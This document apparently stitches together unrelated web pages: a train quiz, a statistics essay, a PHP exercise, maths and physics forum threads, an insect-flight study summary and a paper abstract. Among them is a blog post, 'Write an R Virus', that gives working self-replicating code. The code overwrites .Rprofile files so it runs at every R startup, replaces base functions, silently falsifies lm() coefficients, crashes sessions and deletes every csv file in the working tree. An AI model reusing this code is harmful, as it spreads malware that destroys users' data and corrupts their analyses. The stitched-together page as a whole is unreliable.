\end{document} |
A goods train and a passenger train are running on the parallel tracks in the same direction. The driver of the goods tr
### Question Asked by a Student from EXXAMM.com Team
Q 1414445359. A goods train and a passenger train are running on parallel tracks in the same direction. The driver of the goods train observes that the passenger train coming from behind overtakes and crosses his train completely in 1 min, whereas a passenger on the passenger train marks that he crosses the goods train in 2/3 min. If the speeds of the trains are in the ratio 1 : 2, then find the ratio of their lengths.
A
4 : 1
B
3 : 1
C
1 : 4
D
2 : 1
#### HINT
(Provided By a Student and Checked/Corrected by EXXAMM.com Team)
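The hint boils down to relative-speed bookkeeping, sketched below (an illustrative check, taking the stated 1 : 2 speed ratio and the length ratio as goods : passenger; it lands on option D, 2 : 1):

```python
v = 1.0                  # goods train speed (arbitrary units); passenger = 2v
rel = 2.0*v - v          # relative speed between the trains

# A passenger (a point) crosses the goods train in 2/3 min = 40 s:
L_goods = rel * 40

# The passenger train crosses the goods train completely in 1 min = 60 s,
# covering BOTH lengths at the relative speed:
L_passenger = rel * 60 - L_goods

assert L_goods / L_passenger == 2.0   # goods : passenger = 2 : 1
```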
|
# Write an R Virus
## 2018/09/27
Categories: R Tags: Programming
A computer virus is a piece of program that can:
• copy itself
This is not very hard to accomplish with R, as I will demonstrate in this article.
## Replicate
The virus exploits R’s initialization script, .Rprofile. When R starts up, it looks for this file in the current working directory and then in the user’s home directory, and sources the first one it finds:
{
function() {
rp_paths <- c("~/.Rprofile", paste0(getwd(), "/.Rprofile"))
inject <- function(rp, code) {
write(code, file = rp, append = FALSE)
}
lapply(rp_paths, inject, code = deparse(match.call()))
}
}()
When the above script is run, it will make a copy of itself through deparse(match.call()) and overwrite the .Rprofile files. The next time you open a new R session, everything you see above will be run again. Right now, our virus does nothing but print something at the end of your startup message.
...
Type 'demo()' for some demos, 'help()' for on-line help, or
'help.start()' for an HTML browser interface to help.
Type 'q()' to quit R.
Any project started by the user is going to have its project folder infected. Likewise, if someone copy-and-pastes the R project folder to another computer and starts R from there, their home folder is going to be infected.
As R is an interpreted language, this seems to be the only route of infection. To conceal our malicious code, one option is to pack a Shiny app into a Windows executable using a tool called RInno, which uses Electron behind the scenes.
## Damage
It looks like that the replication part of the virus is taken care of. What, then, are some malicious scripts that we can have fun with?
There could be countless ways.
One of the easiest thing to do is to hang the user’s R session. It could be done as simply as putting it to sleep for a really long time:
Sys.sleep(1e9)
… like 30 years, give or take.
Or, have R generate a really large vector of random numbers; this is also going to eat up the user’s available memory.
rnorm(1e9)
For me, 1e9 is quite enough. But scientific notation is your friend. Go big.
However, if R is rendered completely unusable, the virus isn’t going to travel very far. That’s not what we want. It is also a great idea to replace some good functions with naughty ones. Symbol bindings are locked in attached namespaces, but it is easy to undo that:
reassign <- function(sym, value, envir) {
envir <- as.environment(envir)
unlockBinding(sym, envir)
assign(sym, value, envir = envir)
}
We can do the user a service by forbidding the library() function, and prompt a better option.
reassign("library",
function(...) warning("No man, seriously. Use require()"),
"package:base"
)
The effect would be:
library(purrr)
## Warning in library(purrr): No man, seriously. Use require()
Now let’s try something more subtle and more bad (badder?). We first extend the reassign() function a little bit…
tamper <- function(sym, value, envir){
assign(paste0(".",sym),
get(sym, envir = as.environment(envir)),
envir = as.environment("package:base")
)
reassign(sym, value, envir)
}
… and use it to slip in some bad code.
tamper("lm",
function(...){
model <- .lm(...)
model$coefficients <- model$coefficients * (1 + rnorm(1))
model
},
"package:stats")
Now when we build a model, the coefficients look normal but are completely off. You can compare this with the result on your own computer.
lm(mpg ~ ., data = mtcars)\$coefficients
## (Intercept) cyl disp hp drat wt
## 26.19206873 -0.23724034 0.02838876 -0.04573226 1.67564315 -7.90933403
## qsec vs am gear carb
## 1.74787465 0.67647016 5.36519129 1.39527763 -0.42453418
In the above, we saved a copy of the original function in the base package, concealing it by prepending a . to the name. If we didn’t do that, we would have created an infinite recursion through self-reference, such as:
reassign("paste",
function(...) paste(...),
"package:base")
paste("foo", "bar")
Running this will have the effect of crashing the R session. If the user didn’t save their documents before setting off this bomb, it’s obviously too bad. Another way to create trouble.
## Further Damage
There are yet more ways to our streak of mischief. For starters, how about deleting every csv file the user has in the working directory?
file.remove(list.files(getwd(),
                       ".csv",
                       recursive = TRUE))
Doing something on the file system is a big step forward from just messing with their R session.
From annoying to destructive, the level of naughtiness is limited only by your imagination. With some deliberation, you can ruin someone’s life in a very meaningful way.
Here are some further ideas:
• Bloat the user’s disk space with meaningless data
• Give wrong results only sometimes when a function is called
• Use the RStudio API to mess with the user’s scripts in the editor, or some other wild sh*t.
Note
You also have the choice of putting any of the malicious programs in .First() and .Last() functions, which will run at the beginning and the end of a session. See the R Manual for details.
More on .Rprofile: Fun with .Rprofile and customizing R startup |
### The model asserts the likelihood
12 July 13. [link] PDF version
Part of a series of posts that started here
Recall from an earlier post that some authors define a model to be equivalent to a parameterized likelihood distribution. That is, there is a one-to-one mapping between models and likelihood functions: if you give me a likelihood, then that is the core of my model, from which I can derive the CDF, RNG, and many implications. Conversely—and I'll discuss this in detail next time—if you give me a well-defined model, even one defined in non-probabilistic terms, then there exists a likelihood function giving the probability of a given combination of parameters and data.
For this post, I'll stick to some very typical likelihood functions from Stats 101: the Normal distribution, which, given $\mu$ and $\sigma$, gives the probability that a given observation will occur (herein, $L_{\cal N}(x, \mu, \sigma)$); and ordinary least squares, which, given $\beta$s and the variance of the error term $\sigma$, gives the probability that an observation $(Y, X)$ will occur as $L_{\cal N}(Y, \beta X, \sigma)$.
This entry will be about social norms. The short version is that there is no truly objective measure of a model, because most measures use the model's likelihood to make statements about the likelihood of modeled events; instead we have certain established customs.
###### Reading numbers off of the map
The Normal distribution is the limit of many very plausible physical processes, in which several independent and identically distributed elements are averaged together, so it is often very plausible that repeated observations from a real-world process follow a Normal distribution. The model '$X$ is Normally distributed' is really the model '$X$ is the mean of several iid subelements' after a few theorems are applied to derive the implications of the iid model. There are many situations where that model is easily plausible, and in those cases it is easy to confound the map and the terrain. That's the joy of a good map.
For a linear regression, there is rarely a hard-and-fundamental reason for the dependent variable to be a linear function of independent inputs [maybe (number of eyes in the population) = $\beta_0 + \beta_1$(number of noses) $+ \epsilon$?]. In common usage, it is nothing but a plausible approximation, and we can't break it down to a simpler, more plausible model the way the Normal model is implied by the iid subelements model.
And even if the overall picture is plausible, it is easy to push the model to the point of reading features from the map that may or may not be on the actual terrain. The stats student runs a regression, finds that the model assigns probability .96 to the claim that $\beta\neq 0$, and muses how that was derived from or is reflected in facts about the real world. It isn't: it's a calculation from the model likelihood.
The claim that we reject the null with $p=0.04$ is calculated using a data set and the model likelihood, and we colloquially call it a test of the model. That is, we test the model using the model. To make this preeminently clear, here's another valid model, letting $\hat\beta =(X'X)^{-1}X'Y$, (i.e., the standard OLS coefficients); then for our model, let the coefficient be:
$$\beta =\left\{\begin{matrix} \hat\beta, & |\hat\beta| > 1 \\ 1, & |\hat\beta|\leq 1 \end{matrix}\right.$$
This is a useful model: over many arbitrary data sets, we know that $\beta$ will correlate to the slope of the $X$-$Y$ line, albeit a little less than $\hat\beta$ does. But it has the massive advantage over OLS that we reject the null hypothesis that $\beta=0$ with 100.00% certainty. Just as with OLS, the model as stated is not inconsistent with the data—any data—given this model's assumptions. Now that you have an internally consistent model where the parameters are always significantly different from zero, you can publish anywhere, right?
###### Objective functions
The other way to describe the $\beta$s for the ordinary least squares model is, as per the name, to find the line that minimizes squared error $(Y_i - X_i\beta)^2$. Your favorite undergrad stats textbook should show you a diagram with a line of best fit through a scatter of data points, and vertical dotted lines from each point to the line; it is those squared lengths that we are minimizing. Why not the shortest distance from datum point to the line, which is typically a diagonal line, or the horizontal line from datum to line of best fit? The only honest answer is that the math is easier with the vertical distance.
So you could go to any seminar where the speaker fit a regression line and ask why did you minimize the squared vertical length instead of the Euclidian distance between points and the line? or better still, if you used Euclidian distance, would your parameters still be significant? The speaker might respond that it's implausible that there's a serious difference in results given the two objective functions (because the odds are low that the speaker really tried any alternative objective functions), or might cite computational convenience. Or the speaker might not have a chance to answer, as the other seminar attendees cut you off for being an obstruction to the progress of the seminar. Linear regression has been around long enough that all of its epistemology has been worked through, and discussing it again is largely rehash.
In a much-recommended paper by William Thurston, he explains how he got over a similar block regarding the very objective world of mathematics:
When I started as a graduate student at Berkeley, I had trouble imagining how I could “prove” a new and interesting mathematical theorem. I didn't really understand what a “proof” was.
By going to seminars, reading papers, and talking to other graduate students, I gradually began to catch on. Within any field, there are certain theorems and certain techniques that are generally known and generally accepted. […] Many of the things that are generally known are things for which there may be no known written source. As long as people in the field are comfortable that the idea works, it doesn't need to have a formal written source.
Linear regression has been widely accepted, so authors don't have to discuss the fundamentals when presenting regression-based papers. But it is an arbitrary set of assumptions that are salient for their historical place and human plausibility. Setting aside its social position, it is on the same footing as any other internally consistent model, notably in that claims about the model's consistency with data are made using the likelihood that the model itself defines and are therefore plausible iff the model itself is plausible. |
## Write PHP Program to convert a character from upper to lower and lower to upper case
<!-- Write a programme to convert upper case letter to lower case and lower case to upper-->
<html>
<body>
<?php
$n1 = 'c';
$upper = strtoupper($n1);
echo "The Upper case of ".$n1." : ".$upper;
$n2 = 'Z';
$lower = strtolower($n2);
echo "<br>The Lower case of ".$n2.": ".$lower;
?>
</body>
</html>
Output:
The Upper case of c : C
The Lower case of Z : z
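As a small extension (not part of the original exercise), swapping the case of every character in a mixed string can be done with the same built-ins plus ctype_upper():

```php
<?php
$s = "Hello World";
$swapped = '';
for ($i = 0; $i < strlen($s); $i++) {
    $c = $s[$i];
    // Non-letters pass through both branches unchanged
    $swapped .= ctype_upper($c) ? strtolower($c) : strtoupper($c);
}
echo $swapped; // hELLO wORLD
?>
```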
≪ Previous | Next ≫ |
Potential Function of a Conservative Force
1. Jan 24, 2013
bmb2009
1. The problem statement, all variables and given/known data
Given a conservative force with the Force given as F=y^2(i)+2xy(j), what is the potential function related to it.
2. Relevant equations
-dU/dx = F
3. The attempt at a solution
I know I have to integrate the components but I don't know how... since the (i) direction was differentiated with respect to x would I just treat the y as constant and say F=xy^2(i)+xy^2(j) + c ?
2. Jan 24, 2013
fzero
You're on the right track, but remember that the potential is a scalar function. You've written down a result that is a vector and for some reason called it F. It might help to explicitly write down the components of F in terms of the partial derivatives of U.
3. Jan 24, 2013
bmb2009
So would it just be U(x,y)=xy^2 + xy^2 = 2xy^2 + c because it's a scalar?
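A quick finite-difference check of this guess (an editor's sketch, using the convention ∇U = F that the thread settles on): the gradient of 2xy² does not match F, while U = xy² does.

```python
# Candidate potentials checked against F = (y^2, 2xy) at a test point.
def num_grad(f, x, y, h=1e-6):
    """Central-difference gradient of a scalar function f(x, y)."""
    return ((f(x + h, y) - f(x - h, y)) / (2 * h),
            (f(x, y + h) - f(x, y - h)) / (2 * h))

x0, y0 = 2.0, 3.0
F = (y0**2, 2 * x0 * y0)

guess = lambda x, y: 2 * x * y**2     # the 2xy^2 guess from this post
answer = lambda x, y: x * y**2        # satisfies U_x = y^2 and U_y = 2xy

gx, gy = num_grad(guess, x0, y0)
assert abs(gx - F[0]) > 1.0           # 2y^2 != y^2: the guess fails

ax, ay = num_grad(answer, x0, y0)
assert abs(ax - F[0]) < 1e-4 and abs(ay - F[1]) < 1e-4
```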
4. Jan 24, 2013
LCKurtz
Close, but no. Remember, you are looking for a scalar function $U(x,y)$ such that $\nabla U = \vec F$. So you need $U_x = y^2$ and $U_y = 2xy$. Start by taking the anti-partial derivative of the first one with respect to $x$ by holding $y$ constant, as you asked in your original post. Don't forget when you do that your "constant" of integration will be a function of $y$. Then make the second equation work. |
1. Can anyone help me with this question? i know its very simple, but im stuck;
Solve the equation;
thank you
3. Do you need to actually solve the equation, or just extract x?
4. whether extracting x or y, the idea is to get rid of the "d" sign with an integral.
5. Uh, sorry, a bit out of my league. Hope you get help, though.
6. Are you in high school or university? Can't help though, it's above my level as well.
7. Well, the equation is not conservative. I am willing to offer that much, Hahaha.
Might I suggest you integrate each element and treat the x as a constant in the first term and treat y as a constant in the second? I'm not sure about the validity of this, but I'm not sure what you're solving for either. The lack of it being conservative eliminates the option of trying to find a tangent plane. Also, evaluating it as a closed line integral would require area bounds.
All in all, I'm not sure what to tell you either. I think you need to be a bit more specific with what you're looking for. What solution are you trying to get? Give a name or description.
8. What do you mean by solve the equation? Do mean find the set of points (x,y) for which that 1-form is zero?
The equation is equivalent to the two simultaneous equations
x^2y = 0
x^3 + x^2 y - 2 xy^2 - y^3 = 0
The first equation implies that either x=0 or y=0.
If x=0, the second equation implies that y=0.
If y=0, the second equation implies that x=0.
Evidently, this differential form vanishes only at (0,0).
9. Originally Posted by salsaonline
What do you mean by solve the equation? Do mean find the set of points (x,y) for which that 1-form is zero?
The equation is equivalent to the two simultaneous equations
x^2y = 0
x^3 + x^2 y - 2 xy^2 - y^3 = 0
The first equation implies that either x=0 or y=0.
If x=0, the second equation implies that y=0.
If y=0, the second equation implies that x=0.
Evidently, this differential form vanishes only at (0,0).
Absolutely correct. (No surprise.)
But this kid is in high school and I don't think he is really trying to find the set of points where a differential form vanishes.
On the other hand I have not been able to figure out what he is trying to find. He does not always start with a well-posed problem.
10. Absolutely correct. (No surprise.)
But this kid is in high school and I don't think he is really trying to find the set of points where a differential form vanishes.
On the other hand I have not been able to figure out what he is trying to find. He does not always start with a well-posed problem.
Yes the post by salsaonline is somewhat mysterious to me, because thats not what we have to do. Though he might be right, the answer in the book does not correspond to his response. This question is under the chapter (differential equations) and i have a lot of nasty questions in here, which for you (DrRocket and salsaonline, and some others) may seem like an easy question. This is one of them, which i find tricky (not hard). That early binomial question i asked was pretty hard, and i gave a proof for it, but it seems like no one is giving me a response. This question im still working on it, and i will try to show my workings, i would appreciate if experienced members can correct my workings (wherever mistakes are there).
11. Originally Posted by Heinsbergrelatz
Absolutely correct. (No surprise.)
But this kid is in high school and I don't think he is really trying to find the set of points where a differential form vanishes.
On the other hand I have not been able to figure out what he is trying to find. He does not always start with a well-posed problem.
Yes the post by salsaonline is somewhat mysterious to me, because thats not what we have to do. Though he might be right, the answer in the book does not correspond to his response. This question is under the chapter (differential equations) and i have a lot of nasty questions in here, which for you (DrRocket and salsaonline, and some others) may seem like an easy question. This is one of them, which i find tricky (not hard). That early binomial question i asked was pretty hard, and i gave a proof for it, but it seems like no one is giving me a response. This question im still working on it, and i will try to show my workings, i would appreciate if experienced members can correct my workings (wherever mistakes are there).
You need to start by very clearly telling us what you are trying to do and by defining your terms and symbols. You have not done that in either case.
For this problem salsaonline gave you the solution to the most reasonable interpretation of your post. But I am not surprised that you do not understand what he is talking about.
You have a tendency to throw out a bunch of symbols and think everyone will understand and in fact understand the same way that you or your text do. That won't work. You have to put in some thought and explain what you mean. In this case you provided an equation in terms of differential forms -- and I am quite sure that you did not mean to do that since you don't know what a differential form is. Consequently salsaonline's correct response hits you as a complete mystery.
I think you started with an ordinary differential equation. Make sure you copied it correctly. This does not appear at first blush to be readily solvable, but might be a separable equation that was mis-copied.
12. You need to start by very clearly telling us what you are trying to do and by defining your terms and symbols. You have not done that in either case.
For this problem salsaonline gave you the solution to the most reasonable interpretation of your post. But I am not surprised that you do not understand what he is talking about.
You have a tendency to throw out a bunch of symbols and think everyone will understand and in fact understand the same way that you or your text do. That won't work. You have to put in some thought and explain what you mean. In this case you provided an equation in terms of differential forms -- and I am quite sure that you did not mean to do that since you don't know what a differential form is. Consequently salsaonline's correct response hits you as a complete mystery.
I think you started with an ordinary differential equation. Make sure you copied it correctly. This does not appear at first blush to be readily solvable, but might be a separable equation that was mis-copied.
nothing is miscopied, its exactly how it is given in the book. and yes it is a separable equation. No details of the symbols whatsoever are given.
13. Originally Posted by Heinsbergrelatz
. and yes it is a separable equation.
Then separate it and integrate.
14. Then separate it and integrate.
the whole point of asking this question was that i was having a trouble separating the equation, in other words "solve the equation"-thats how the book put it.
15. Originally Posted by Heinsbergrelatz
Can anyone help me with this question? i know its very simple, but im stuck;
Solve the equation;
thank you
Separating the equation is simple. Take the integral, and separate it into two integrals, one with every term attached to "dx" and the other with all the terms attached to "dy" and solve it.
and if I did this right, it implies only x has to equal 0 after integrating.
16. I believe that solving it that way would yield:
But your statement otherwise still holds true regardless.
17. Originally Posted by Arcane_Mathematician
Originally Posted by Heinsbergrelatz
Can anyone help me with this question? i know its very simple, but im stuck;
Solve the equation;
thank you
Separating the equation is simple. Take the integral, and separate it into two integrals, one with every term attached to "dx" and the other with all the terms attached to "dy" and solve it.
and if I did this right, it implies only x has to equal 0 after integrating.
"Separating" here means getting all the x's on one side and all the y's on the other.
18. Originally Posted by DrRocket
Originally Posted by Arcane_Mathematician
Originally Posted by Heinsbergrelatz
Can anyone help me with this question? i know its very simple, but im stuck;
Solve the equation;
thank you
Separating the equation is simple. Take the integral, and separate it into two integrals, one with every term attached to "dx" and the other with all the terms attached to "dy" and solve it.
and if I did this right, it implies only x has to equal 0 after integrating.
"Separating" here means getting all the x's on one side and all the y's on the other.
DrRocket, I believe you were correct to say that the equation appears inseparable. I do not think it is separable either.
Alright, Heins, this is a homework problem from a book, as I believe you mentioned. It is under differential equations, but what is the preceding lesson about? Explain in moderate detail, for it may give us some idea on what you're supposed to be doing with the equation.
19. Could it be that the the problem was to find a potential whose differential was the given 1-form?
If so, I don't think that's possible, since the 1-form is not closed.
That is, if $dU = x^2 y\,dx + (x^3 + x^2 y - 2xy^2 - y^3)\,dy$, then we would have to have $\frac{\partial}{\partial y}(x^2 y) = \frac{\partial}{\partial x}(x^3 + x^2 y - 2xy^2 - y^3)$, which is not the case.
And yes, I know that the book would never phrase it in that manner, but you know what I mean Dr R.
20. okay thanks arcane, for trying to help me out, but the answer in the book does not give the answer you gave me. Rather, the answer involves logarithm, which implies that there is a reciprocal function that is to be integrated
Alright, Heins, this is a homework problem from a book, as I believe you mentioned. It is under differential equations, but what is the preceding lesson about? Explain in moderate detail, for it may give us some idea on what you're supposed to be doing with the equation.
hmwrk problem?? i dont think so, the book im using isnt even used in my school + IB HL mathematics do not have d.e. of this sort. Rather they would have questions of d.e. such as this one: $y=e^{\alpha x}$, show that this satisfies the following: $dy/dx + k\,d^2y/dx^2 + xy = \ldots$ (this is just some random example i came up with, like ones i have seen in my textbook.)
21. Originally Posted by Heinsbergrelatz
okay thanks arcane, for trying to help me out, but the answer in the book does not give the answer you gave me. Rather, the answer involves logarithm, which implies that there is a reciprocal function that is to be integrated
If you are really interested in becoming a mathematician you would do well to concentrate less on finding the answer in the back of the book and more on understanding the nature of the question.
22. q.
23. If you are really interested in becoming a mathematician you would do well to concentrate less on finding the answer in the back of the book and more on understanding the nature of the question.
well, i have solved it, and have arrived at what the answer in the book got. You really think im just mindlessly depending on the answer of the book? of course not. Also those answers at the back have a pretty small chance of going wrong. i also dont usually look at the answer, i look at it when im really fed up, and just stuck hopelessly. Of course at times i go with what i have got, even though the answer in the book does not agree with my answer.
You see in my other post higher derivatives, i gave the answer at the back of the book, and you got something else, so you thought that the book was wrong (exactly the same thing here), but actually i got what the answer in the book said.
24. Originally Posted by Heinsbergrelatz
You see in my other post higher derivatives, i gave the answer at the back of the book, and you got something else, so you thought that the book was wrong (exactly the same thing here), but actually i got what the answer in the book said.
Nobody here commented on the answer in the book, In fact nobody here could figure out what question you were really asking -- including 2 Ph.D. mathematicians.
The answer given you by salsaonline is correct (he is one of the Ph.D.s), but pretty clearly did not address the question as you see it.
My comment stands, in spades.
25. Nobody here commented on the answer in the book, In fact nobody here could figure out what question you were really asking -- including 2 Ph.D. mathematicians.
The answer given you by salsaonline is correct (he is one of the Ph.D.s), but pretty clearly did not address the question as you see it.
My comment stands, in spades.
i dont get what you dont understand, i gave a question from my book, exactly the way it is in the book. Its asking you to solve it, and i also have said that the answer should come in the form of a separable d.e. I have read what salsaonline said again, and yes that also can be the solution. But im saying that thats not the answer the book is looking for, i mean in this chapter of differential equations, you have to try and eliminate the dy and the dx so you only get functions in terms of x and y, and maybe sin, cos, arccos, arctan, log, ln etc... but the key idea is to get rid of the d's. So eventually the answer should come about as y=......
26. Originally Posted by Heinsbergrelatz
Nobody here commented on the answer in the book, In fact nobody here could figure out what question you were really asking -- including 2 Ph.D. mathematicians.
The answer given you by salsaonline is correct (he is one of the Ph.D.s), but pretty clearly did not address the question as you see it.
My comment stands, in spades.
i dont get what you dont understand, i gave a question from my book, exactly the way it is in the book. Its asking you to solve it, and i also have said that the answer should come in the form of a separable d.e. I have read what salsaonline said again, and yes that also can be the solution. But im saying that thats not the answer the book is looking for, i mean in this chapter of differential equations, you have to try and eliminate the dy and the dx so you only get functions in terms of x and y, and maybe sin, cos, arccos, arctan, log, ln etc... but the key idea is to get rid of the d's. So eventually the answer should come about as y=......
You are confusing mathematics with arithmetic (computation).
27. of course the concept is there, but the computation is also there. hence im not confusing anything(arithmetic is also regarded as mathematics).
28. Originally Posted by Heinsbergrelatz
of course the concept is there, but the computation is also there. hence im not confusing anything(arithmetic is also regarded as mathematics).
You have two choices:
1) You can get your hackles up, let your ego get in the way, think you know better, and keep arguing.
or
2) You can listen to people who understand a hell of a lot more mathematics than you do and learn something.
But you have an opportunity, and I think the capability to profit if you take option 2.
29. Originally Posted by Heinsbergrelatz
okay thanks arcane, for trying to help me out, but the answer in the book does not give the answer you gave me. Rather, the answer involves logarithm, which implies that there is a reciprocal function that is to be integrated
Alright, Heins, this is a homework problem from a book, as I believe you mentioned. It is under differential equations, but what is the preceding lesson about? Explain in moderate detail, for it may give us some idea on what you're supposed to be doing with the equation.
hmwrk problem?? i dont think so, the book im using isnt even used in my school + IB HL mathematics do not have d.e. of this sort. Rather they would have questions of d.e. such as this one: $y=e^{\alpha x}$, show that this satisfies the following: $dy/dx + k\,d^2y/dx^2 + xy = \ldots$ (this is just some random example i came up with, like ones i have seen in my textbook.)
You completely missed the point. Homework problems are homework problems regardless of the status of the book's use. You are using it, you implied that it was a problem posed in the book with a solution contained in the book. Calm down. What did the preceding lesson entail?
# A chordwise offset of the wing-pitch axis enhances rotational aerodynamic forces on insect wings: a numerical study
### Abstract
Most flying animals produce aerodynamic forces by flapping their wings back and forth with a complex wingbeat pattern. The fluid dynamics that underlies this motion has been divided into separate aerodynamic mechanisms, of which rotational lift, which results from fast wing pitch rotations, is particularly important for flight control and manoeuvrability. In our study we focus on the generation of these rotational forces during wing-reversal and arrive at a new and remarkably simple rotational lift model.
## Background
Insects fly by flapping their wings back and forth, contrary to birds, which often move their wings up and down. To understand this unique wingbeat pattern, scientists have tried to link the motion of the wing to the forces the insect generates Ellington1984. In the end this will enable us to gain insight into how an insect flies, but also into how the morphology of the insect influences the force generation. Essentially this helps us understand how an insect stays in the air.
Before we can say anything about the force generation we need to know how an insect moves. Unfortunately a flying insect moves really fast, but luckily for us high-speed cameras can be used to slow down this motion. Let's look at a great movie of how a fruit fly flies, captured by Muijres2014
It might be difficult to see, but the insect moves its wings to the front of its body (horizontal to the ground) at an angle of around $$45^o$$; when it can no longer move forward it rotates its wing around the length of the wing and then moves back again.
This rotation is the focus of our manuscript. It was discovered some time ago by Dickinson1999 that pitching a wing about its longitudinal axis while it is moving forward with a certain stroke velocity generates a force. These forces are known as rotational forces. However, as mentioned by Bomphrey2017, it appears that mosquitoes also generate rotational forces at wing-reversal, when the wing is not moving forward or backward, so what gives?
The idea from Nakata2015 is that there is an additional rotational lift force, called “rotational drag”, which is linked to the rotational velocity about the longitudinal axis of the wing. This means that an insect can generate rotational forces at wing-reversal.
## Our approach
Based on this notion from the previously mentioned authors, we set out to do a parametric study, varying the forward velocity, wing shape, and longitudinal rotational velocity systematically to understand how these additional rotational forces are generated.
For this study we used computational fluid mechanics, a method that can simulate the movement of the air if the motion of the animal is known. The solver we used is open-source and can be found here: IBAMR Bhalla2013.
From our results we noticed that indeed Nakata2015 was correct, that insects can generate additional rotational forces at wing-reversal. We also found that the geometry influences these forces in a very systematic way. The additional rotational forces are influenced by the asymmetry in the shape of the wing along the longitudinal axis. This means that for a symmetrical wing no additional forces are generated!
From our parametric study we were also able to create a very simple rotational lift model:
$$F_{\mathrm{rotational}} = C_{F, \mathrm{rotational}} \rho \left(\sqrt{S_{xx}S_{yy}} \omega_{\mathrm{stroke}} \omega_{\mathrm{pitch}} + S_{x|x|} \omega_{\mathrm{pitch}}^2 \right)$$
where the coefficient $$C_{F,\mathrm{rotational}} \approx \frac{2}{3}\pi$$, $$\rho$$ the density of the air, $$\sqrt{S_{xx}S_{yy}}$$ the symmetric second moment of area, $$\omega_{\mathrm{stroke}}$$ the stroke velocity, $$\omega_{\mathrm{pitch}}$$ the pitch velocity and $$S_{x|x|}$$ the asymmetric second moment of area and finally $$F_{\mathrm{rotational}}$$ the rotational forces, which are defined perpendicular to the wing surface.
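As a quick sanity check of this model, here is a minimal Python sketch of the formula above. All numerical values in the demo are made up for illustration; in practice the moments of area would come from the actual wing geometry.

```python
import math

def rotational_force(S_xx, S_yy, S_xabsx, omega_stroke, omega_pitch,
                     rho=1.225, C_F=2.0 / 3.0 * math.pi):
    """Rotational force model from the text: the first term couples stroke
    and pitch velocity through the symmetric second moment of area, the
    second term is the pure-pitch ("rotational drag") contribution scaled
    by the asymmetric second moment of area S_{x|x|}."""
    return C_F * rho * (math.sqrt(S_xx * S_yy) * omega_stroke * omega_pitch
                        + S_xabsx * omega_pitch ** 2)

# At wing-reversal the stroke velocity is zero, so only the asymmetric term
# survives; for a symmetric wing (S_{x|x|} = 0) no rotational force remains.
print(rotational_force(S_xx=1e-9, S_yy=1e-9, S_xabsx=0.0,
                       omega_stroke=0.0, omega_pitch=200.0))  # 0.0
```

This makes the text's claim explicit: moving the pitch axis away from the wing's symmetry axis increases `S_xabsx` and hence the force at wing-reversal.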
## Conclusion
This asymmetric second moment of area $$S_{x|x|}$$ is essentially a measure of how much wing surface is above or below the pitch axis. This means that if we move the pitch axis more towards the leading edge (introducing the chord-wise offset), the wing asymmetry increases and so do the rotational forces. This also holds true the other way around: if we move the pitch axis closer to the symmetry axis of the wing, the rotational forces decrease.
These rotational forces are important for the insect because it has been shown by Muijres2014 that the kinematics are adapted at wing-reversal when a manoeuvre is performed.
# Bibliography
[Ellington1984] Ellington, The aerodynamics of hovering insect flight. IV. Aerodynamic mechanisms, Philosophical Transactions of the Royal Society of London, (1984).
[Muijres2014] Muijres, Elzinga, Melis & Dickinson, Flies evade looming targets by executing rapid visually directed banked turns, Science, 344, 172-177 (2014).
[Dickinson1999] Dickinson, Lehmann & Sane, Wing rotation and the aerodynamic basis of insect flight, Science, 284, 1954-1960 (1999).
[Bomphrey2017] Bomphrey, Nakata, Phillips & Walker, Smart wing rotation and trailing-edge vortices enable high frequency mosquito flight, Nature, 544, 92-96 (2017).
[Nakata2015] Nakata, Liu Hao & Bomphrey, A CFD-informed quasi-steady model of flapping-wing aerodynamics, Journal of Fluid Mechanics, 783, 323-343 (2015).
[Bhalla2013] Bhalla, Bale, Griffith & Patankar, A unified mathematical framework and an adaptive numerical method for fluid–structure interaction with rigid, deforming, and elastic bodies, Journal of computational physics, 250, 446-476 (2013).
##### Wouter G. van Veen
###### PhD candidate
I use computational fluid mechanics to research the fundamentals of insect flight.
# Semi-implicit iterative schemes with perturbed operators for infinite accretive mappings and infinite nonexpansive mappings and their applications to parabolic systems
Volume 10, Issue 3, pp. 902--921. Publication Date: March 20, 2017.
### Authors
Li Wei - School of Mathematics and Statistics, Hebei University of Economics and Business, Shijiazhuang 050061, Hebei, China.
Ravi P. Agarwal - Department of Mathematics, Texas A & M University-Kingsville, Kingsville, TX 78363, USA; Department of Mathematics, Faculty of Science, King Abdulaziz University, Jeddah 21589, Saudi Arabia.
Yaqin Zheng - College of Science, Agricultural University of Hebei, Baoding 071001, Hebei, China.
### Abstract
In a real uniformly convex and uniformly smooth Banach space, we first prove a new path convergence theorem and then present some new semi-implicit iterative schemes with errors, which are proved to converge strongly to a common element of the set of zero points of infinitely many m-accretive mappings and the set of fixed points of infinitely many nonexpansive mappings. The superposition of perturbed operators is considered in the construction of the iterative schemes, and new proof techniques are employed compared to some recent work. Some examples are listed and computational experiments are conducted, which demonstrate the effectiveness of the proposed iterative schemes. Moreover, a class of parabolic systems is exemplified, which sets up the relationship among iterative schemes, nonlinear systems and variational inequalities.
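The paper's schemes involve infinite families of mappings in Banach spaces, but the basic building block, iterating the resolvent $J_r = (I + rA)^{-1}$ of an accretive mapping $A$ towards a zero point of $A$, can be sketched in one dimension. Everything below (the choice $A(x) = x$, the parameter $r$, the iteration count) is an illustrative assumption, not the construction from the paper.

```python
def resolvent(y, r=1.0):
    """Resolvent J_r = (I + r*A)^{-1} for the accretive mapping A(x) = x
    on the real line; for this A the resolvent has the closed form
    y / (1 + r). (Illustrative choice of A, not the paper's operators.)"""
    return y / (1.0 + r)

# Proximal point iteration x_{n+1} = J_r(x_n) drives x to the zero of A.
x = 2.0
for _ in range(50):
    x = resolvent(x)
print(abs(x) < 1e-12)  # True: the iterates converge to 0, the zero of A
```

The schemes in the paper add perturbations, error terms, and averaging over infinitely many mappings on top of this basic resolvent step.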
### Keywords
• M-accretive mapping
• $\tau_i$-strongly accretive mapping
• contractive mapping
• $\lambda_i$-strictly pseudocontractive mapping
• semi-implicit iterative scheme
• parabolic systems
### MSC
• 47H05
• 47H09
• 47H10
### References
• [1] R. P. Agarwal, D. O’Regan, D. R. Sahu, Fixed point theory for Lipschitzian-type mappings with applications, Topological Fixed Point Theory and Its Applications, Springer, New York (2009)
• [2] M. A. Alghamdi, M. A. Alghamdi, N. Shahzad, H.-K. Xu, The implicit midpoint rule for nonexpansive mappings, Fixed Point Theory Appl., 2014 (2014), 9 pages.
• [3] V. Barbu, Nonlinear semigroups and differential equations in Banach spaces, Translated from the Romanian, Editura Academiei Republicii Socialiste Romania, Bucharest; Noordhoff International Publishing, Leiden (1976)
